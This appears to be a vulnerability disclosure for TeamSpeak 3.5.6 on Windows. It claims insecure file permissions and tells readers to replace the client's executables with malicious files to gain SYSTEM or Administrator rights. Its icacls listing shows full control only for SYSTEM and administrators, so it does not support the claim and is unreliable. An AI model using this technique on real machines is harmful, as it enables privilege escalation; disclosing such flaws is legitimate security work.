# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
# Date: 2022-02-15
# Exploit Author: Aryan Chehreghani
# Contact: aryanchehreghani@yahoo.com
# Vendor Homepage: https://www.teamspeak.com
# Software Link: https://www.teamspeak.com/en/downloads
# Version: 3.5.6
# Tested on: Windows 10 x64
# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
#application for audio communication between users on a chat channel,
#much like a telephone conference call, Users typically use headphones with a microphone,
#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
#The target audience for TeamSpeak is gamers, who can use the software to communicate,
#with other players on the same team of a multiplayer video game,
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.
# [ Description ]:
#The TeamSpeak Application was installed with insecure file permissions.
#It was found that all folder and file permissions were incorrectly configured during installation.
#It was possible to replace the service binary.
# [ POC ]:
C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
error_report.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
package_inst.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
update.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
Successfully processed 7 files; Failed processing 0 files
# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)